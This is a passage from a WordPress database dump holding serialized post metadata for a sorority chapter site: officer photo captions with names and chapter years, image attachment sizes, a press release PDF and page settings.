255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Dawn J. Kemp\r\nNu Gamma - 1992</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:11;a:13:{s:8:\"imageurl\";s:68:\"https://zphiblgz.org/wp-content/uploads/2016/12/Crystal-Whitaker.jpg\";s:10:\"imagetitle\";s:9:\"Historian\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:162:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Crystal Whitaker\r\nOmega Iota - 2006</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:12;a:13:{s:8:\"imageurl\";s:63:\"https://zphiblgz.org/wp-content/uploads/2016/12/Tracy-Irvin.jpg\";s:10:\"imagetitle\";s:8:\"Chaplain\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:152:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Tracy Irvin\r\nAlpha - 1977</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:13;a:13:{s:8:\"imageurl\";s:64:\"https://zphiblgz.org/wp-content/uploads/2016/12/TamikaDaniel.jpg\";s:10:\"imagetitle\";s:24:\"Immediate Past President\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:164:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Tamika R. Daniels\r\nDelta Delta - 1995</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}}'),(2868,672,'ts_template','a:0:{}'),(2870,672,'ichcpt_settings','a:4:{s:7:\"columns\";s:1:\"6\";s:9:\"col_space\";s:4:\"25px\";s:18:\"caption_shortcodes\";s:2:\"on\";s:10:\"custom_css\";s:0:\"\";}'),(2871,673,'_edit_lock','1481670543:1'),(2872,673,'_edit_last','1'),(2873,673,'ts_template','a:0:{}'),(2874,673,'ich_cpt','a:2:{i:1;a:13:{s:8:\"imageurl\";s:69:\"https://zphiblgz.org/wp-content/uploads/2016/12/KAlawode-150x150.jpeg\";s:10:\"imagetitle\";s:15:\"Vice President \";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:0:\"\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:4:\"auto\";s:12:\"captioncolor\";s:7:\"#ffffff\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:19:\"slide-left-to-right\";s:11:\"borderstyle\";s:5:\"solid\";}i:2;a:13:{s:8:\"imageurl\";s:0:\"\";s:10:\"imagetitle\";s:0:\"\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:0:\"\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:4:\"auto\";s:12:\"captioncolor\";s:0:\"\";s:9:\"captionbg\";s:0:\"\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:19:\"slide-left-to-right\";s:11:\"borderstyle\";s:5:\"solid\";}}'),(2875,673,'ichcpt_settings','a:4:{s:7:\"columns\";s:1:\"5\";s:9:\"col_space\";s:4:\"10px\";s:18:\"caption_shortcodes\";s:2:\"on\";s:10:\"custom_css\";s:0:\"\";}'),(2876,674,'_wp_attached_file','2016/12/Proclamation.jpg'),(2877,674,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:933;s:4:\"file\";s:24:\"2016/12/Proclamation.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Proclamation-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Proclamation-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Proclamation-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Proclamation-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Proclamation-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:24:\"Proclamation-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:24:\"Proclamation-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"Proclamation-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Proclamation-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Proclamation-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Proclamation-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2878,675,'_wp_attached_file','2016/12/Proclamation2.jpg'),(2879,675,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:976;s:4:\"file\";s:25:\"2016/12/Proclamation2.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Proclamation2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Proclamation2-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Proclamation2-768x535.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:535;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Proclamation2-1024x714.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:714;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Proclamation2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:25:\"Proclamation2-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:25:\"Proclamation2-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"Proclamation2-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"Proclamation2-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Proclamation2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Proclamation2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2880,676,'_wp_attached_file','2016/12/Proclamatioin3.jpg'),(2881,676,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:933;s:4:\"file\";s:26:\"2016/12/Proclamatioin3.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Proclamatioin3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Proclamatioin3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Proclamatioin3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Proclamatioin3-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Proclamatioin3-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:26:\"Proclamatioin3-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:26:\"Proclamatioin3-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"Proclamatioin3-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Proclamatioin3-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Proclamatioin3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"Proclamatioin3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2882,677,'_wp_attached_file','2016/12/GroupPic.jpg'),(2883,677,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:20:\"2016/12/GroupPic.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"GroupPic-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"GroupPic-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"GroupPic-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"GroupPic-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"GroupPic-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"GroupPic-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"GroupPic-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"GroupPic-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"GroupPic-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"GroupPic-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2884,678,'_wp_attached_file','2016/12/FinalChericeWeb.png'),(2885,678,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:400;s:4:\"file\";s:27:\"2016/12/FinalChericeWeb.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"FinalChericeWeb-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"FinalChericeWeb-225x300.png\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"FinalChericeWeb-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:27:\"FinalChericeWeb-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:27:\"FinalChericeWeb-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"FinalChericeWeb-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"FinalChericeWeb-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"FinalChericeWeb-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2886,681,'_wp_attached_file','2016/12/LGZPressRelease.pdf'),(2889,682,'_wp_attached_file','2014/12/LGZPressRelease.png'),(2890,682,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1700;s:6:\"height\";i:2200;s:4:\"file\";s:27:\"2014/12/LGZPressRelease.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"LGZPressRelease-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"LGZPressRelease-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"LGZPressRelease-768x994.png\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"LGZPressRelease-791x1024.png\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"LGZPressRelease-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:27:\"LGZPressRelease-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:27:\"LGZPressRelease-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"LGZPressRelease-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"LGZPressRelease-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"LGZPressRelease-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"LGZPressRelease-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2909,689,'_edit_lock','1484561345:1'),(2910,689,'_edit_last','1'),(2911,689,'ts_template','a:0:{}'),(2912,689,'sermon','a:7:{s:16:\"extern_video_url\";s:0:\"\";s:14:\"your_video_url\";s:0:\"\";s:14:\"your_audio_url\";s:0:\"\";s:16:\"extern_audio_url\";s:0:\"\";s:7:\"summary\";s:0:\"\";s:6:\"author\";s:0:\"\";s:8:\"document\";s:67:\"https://zphiblgz.org/wp-content/uploads/2016/12/LGZPressRelease.pdf\";}'),(2913,689,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(2914,689,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(2915,689,'page_settings',NULL),(2916,689,'post_settings',NULL),(2917,692,'_wp_attached_file','2016/12/FINALLGZ35LOGO.png'),(2918,692,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1580;s:6:\"height\";i:1769;s:4:\"file\";s:26:\"2016/12/FINALLGZ35LOGO.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"FINALLGZ35LOGO-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"FINALLGZ35LOGO-268x300.png\";s:5:\"width\";i:268;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"FINALLGZ35LOGO-768x860.png\";s:5:\"width\";i:768;s:6:\"height\";i:860;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"FINALLGZ35LOGO-915x1024.png\";s:5:\"width\";i:915;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"FINALLGZ35LOGO-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:26:\"FINALLGZ35LOGO-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:26:\"FINALLGZ35LOGO-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"FINALLGZ35LOGO-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"FINALLGZ35LOGO-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"FINALLGZ35LOGO-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"FINALLGZ35LOGO-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2919,689,'ts_article_views','728'),(2920,689,'_touchsize_likes','0'),(2929,698,'_wp_attached_file','2014/12/th-2.jpg'),(2930,698,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2014/12/th-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"th-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:16:\"th-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:16:\"th-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"th-2-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"th-2-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2921,694,'_wp_attached_file','2014/12/15355599_1266335763427202_8553129621538361413_n.jpg'),(2922,694,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:669;s:4:\"file\";s:59:\"2014/12/15355599_1266335763427202_8553129621538361413_n.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"15355599_1266335763427202_8553129621538361413_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"15355599_1266335763427202_8553129621538361413_n-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"15355599_1266335763427202_8553129621538361413_n-768x535.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:535;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:59:\"15355599_1266335763427202_8553129621538361413_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:59:\"15355599_1266335763427202_8553129621538361413_n-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:59:\"15355599_1266335763427202_8553129621538361413_n-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:59:\"15355599_1266335763427202_8553129621538361413_n-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:59:\"15